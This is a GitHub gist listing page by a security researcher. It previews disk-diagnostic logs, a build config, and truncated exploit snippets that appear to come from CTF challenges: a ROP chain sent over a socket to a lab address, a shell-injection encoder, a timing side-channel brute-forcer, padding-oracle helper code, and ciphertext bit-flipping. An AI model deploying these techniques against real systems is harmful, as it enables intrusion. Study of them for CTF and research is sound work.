Skip to content

Instantly share code, notes, and snippets.

View iagox86's full-sized avatar

Ron Bowes iagox86

776 followers · 33 following
View GitHub Profile
@iagox86
iagox86 / gist:3735361
Created September 17, 2012 03:11
smartctl 5.42 2011-10-20 r3458 [x86_64-linux-3.5.3-gentoo] (local build)
Copyright (C) 2002-11 by Bruce Allen, http://smartmontools.sourceforge.net
=== START OF READ SMART DATA SECTION ===
SMART Error Log Version: 1
ATA Error Count: 503 (device log contains only the most recent five errors)
CR = Command Register [HEX]
FR = Features Register [HEX]
SC = Sector Count Register [HEX]
SN = Sector Number Register [HEX]
@iagox86
iagox86 / gist:3735363
Created September 17, 2012 03:12
smartctl 5.42 2011-10-20 r3458 [x86_64-linux-3.5.3-gentoo] (local build)
Copyright (C) 2002-11 by Bruce Allen, http://smartmontools.sourceforge.net
=== START OF INFORMATION SECTION ===
Model Family: Hitachi Deskstar 7K3000
Device Model: Hitachi HDS723030ALA640
Serial Number: MK0311YHG67G9A
LU WWN Device Id: 5 000cca 225c2d63c
Firmware Version: MKAOA580
User Capacity: 3,000,592,982,016 bytes [3.00 TB]
@iagox86
iagox86 / Poracle.rb
Created December 18, 2012 17:14
def Poracle.generate_set(base_list)
mapping = []
base_list.each do |i|
mapping[ord(i)] = true
end
0.upto(255) do |i|
if(!mapping[i])
base_list << i.chr
end
@iagox86
iagox86 / sploit.rb
Created December 20, 2012 03:44
require 'socket'
s = TCPSocket.new "192.168.1.103", 12345
padding = "" + # NOTE: eax points to the socket
"\x79\x12\xc1\x77" + # &(xchg eax, ebx / ret) *** ebx = pointer to the socket
"\xfb\xa6\xf6\x77" + # &(mov edi, [ebx]) *** edi = the actual socket
"\x0a\x98\xe7\x77" + # &VirtualAlloc
@iagox86
iagox86 / sploit.rb
Created December 24, 2012 06:28
#!/usr/bin/ruby
require 'open3'
def shell_hex(str)
out = "`printf '"
str.each_byte do |b|
if(b >= 0x20 && b <= 0x7f && b.chr != "'" && b.chr != "`")
out += b.chr
else
@iagox86
iagox86 / sploit.c
Created December 26, 2012 05:13
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <unistd.h>
#define rdtsc() ({ uint64_t x; asm volatile("rdtsc" : "=A" (x)); x; })
#define TRIALS 20
char chars[] = "!abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890";
@iagox86
iagox86 / sploit.c
Created December 26, 2012 05:13
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <unistd.h>
#define rdtsc() ({ uint64_t x; asm volatile("rdtsc" : "=A" (x)); x; })
#define TRIALS 20
char chars[] = "!abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890";
@iagox86
iagox86 / zone4.rb
Created January 5, 2013 20:01
original = "zone-4-F7677DA8-3D77-11E2-BB65-E4BF6188709B".chars.to_a
original_encrypted = ["20d916c6c29ee53c30ea1effc63b1c72147eb86b998a25c0cf1bf66939e8621b3132d83abb1683df619238"].pack("H*").chars.to_a
new_encrypted = ["20d916c6c29ee54343e81ff1b14c1372650cbf19998f51b5c51bf66f49ec62184034a94fc9198fa9179849"].pack("H*").chars.to_a
0.upto(original.length - 1) do |i|
print((new_encrypted[i].ord ^ original_encrypted[i].ord ^ original[i].ord).chr)
end
puts()
@iagox86
iagox86 / writeup.txt
Last active December 10, 2015 17:49
=====================================
:: (SkullSpace Winnipeg)
=====================================
===========
:: SUMMARY
===========
It was an appropriately chilly day in Winnipeg Winter when we convened
at SkullSpace 2.0 to solve The Year Without a Santa. I kid you not, the
@iagox86
iagox86 / make.conf
Created January 14, 2013 02:29
# These settings were set by the catalyst build script that automatically
# built this stage.
# Please consult /usr/share/portage/config/make.conf.example for a more
# detailed example.
CFLAGS="-Os -pipe -march=native -fpic -fstack-protector-all -D_FORTIFY_SOURCE=2" # -pie -fPIE
CXXFLAGS="-Os -pipe -march=native -fpic -fstack-protector-all -D_FORTIFY_SOURCE=2"
MAKEOPTS="-j9"
LDFLAGS="-Wl,-z,now -Wl,-z,relro"
# WARNING: Changing your CHOST is not something that should be done lightly.